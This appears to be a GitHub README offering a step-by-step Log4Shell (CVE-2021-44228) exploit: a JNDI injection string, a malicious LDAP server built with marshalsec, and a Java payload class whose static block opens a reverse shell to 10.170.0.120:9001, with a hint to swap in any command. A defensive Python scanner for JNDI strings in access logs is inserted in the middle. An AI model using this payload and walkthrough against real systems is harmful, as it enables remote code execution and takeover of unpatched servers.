Log4j-Java-Payload

Simple Java Payload to exploit Log4j vulnerability


About Log4Shell - CVE-2021-44228

Log4j is one of the most popular Java logging frameworks.

This framework makes use of the JNDI API (Java Naming and Directory Interface).

JNDI lets a developer resolve names through naming and directory services. It has a "lookup" function that returns an object from its name. For example, JNDI can query a DNS server to map a domain name to an IP address, and it can also query many other services such as LDAP or NIS.

The vulnerability exists because log4j sends requests to arbitrary LDAP or DNS servers without validating the server's response. An attacker can therefore set up a malicious LDAP server and make the application load and execute a payload hosted behind that fake LDAP server.

Overview of the Attack

(diagram: log4j attack schema)

Exploit Log4j

1. Find Entry Point

You have to find an entry point by injecting a request that triggers a JNDI lookup resolution against the malicious LDAP server.

String to inject: ${jndi:ldap://<ip>:<port>/<name-of-the-payload-to-execute>}

First, you can start a netcat listener and try to trigger it. If the netcat listener receives a connection, you know that the application is vulnerable.

Demo: (screenshots)
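From the defensive side, the lookup string shown above is exactly what a search of web access logs has to find. The following added example (not part of this project) does that check in Python: it URL-decodes each line, matches the ${jndi:...} pattern, and extracts the callback host and port so they can be blocked or alerted on. The log lines and the 10.0.0.5 / canary.example addresses are constructed sample data.

```python
import re
from urllib.parse import unquote

# Shape of the lookup string from the text: ${jndi:<scheme>://<host>:<port>/<name>}
# The host and port are captured so a defender can block the callback address.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|dns)://(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)


def find_jndi_lookups(line: str) -> list:
    """Return one finding per JNDI lookup string present in a single log line.

    The line is URL-decoded first because access logs usually record the raw,
    percent-encoded form of request paths and headers.
    """
    decoded = unquote(line)
    findings = []
    for m in JNDI_RE.finditer(decoded):
        findings.append({
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "path": m.group("path") or "",
        })
    return findings


def scan_log(lines) -> list:
    """Scan an iterable of log lines; each finding also records its 1-based line number."""
    results = []
    for n, line in enumerate(lines, start=1):
        for finding in find_jndi_lookups(line):
            finding["line"] = n
            results.append(finding)
    return results


# Constructed sample access-log lines (not from any real system).
SAMPLE_LOG = [
    '10.0.0.9 - - [10/Dec/2021:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:12:02 +0000] "GET /login HTTP/1.1" 200 77 "-" "${jndi:ldap://10.0.0.5:1389/Exploit}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:03 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fcanary.example%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']}://{hit['host']}:{hit['port']}{hit['path']}")
```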

2. Build Malicious Server

In our case we are going to build a malicious LDAP server. For that you can download this GitHub project: https://github.com/mbechler/marshalsec.git

Once the project is built, you can start a malicious LDAP server that redirects the connection to a web server hosting the payload, so that it is served to the JNDI lookup resolution:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://<Web-Server-IP>:<Port>/#<name-of-the-payload>

Demo: (screenshot)

3. Build Java Payload

Java Payload:

```java
public class ExploitTest {

    // Static initializer: runs as soon as the class is loaded by the JNDI lookup resolution.
    static {
        try {
            java.lang.Runtime.getRuntime().exec(new String[] {"/bin/bash", "-c", "bash -i >& /dev/tcp/10.170.0.120/9001 0>&1"}).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

}
```

Note: You can replace the last element of the string array with whatever command you want executed on the victim host.

When your payload is done and ready, you can compile it.

Note: Keep in mind that the name of your class must be the same as the name of your .java file, otherwise you will get an error during compilation.

Demo: (screenshot)

4. Ready to Exploit

You can now start a web server in the directory containing the compiled .class payload.

Hope you get this: (screenshot)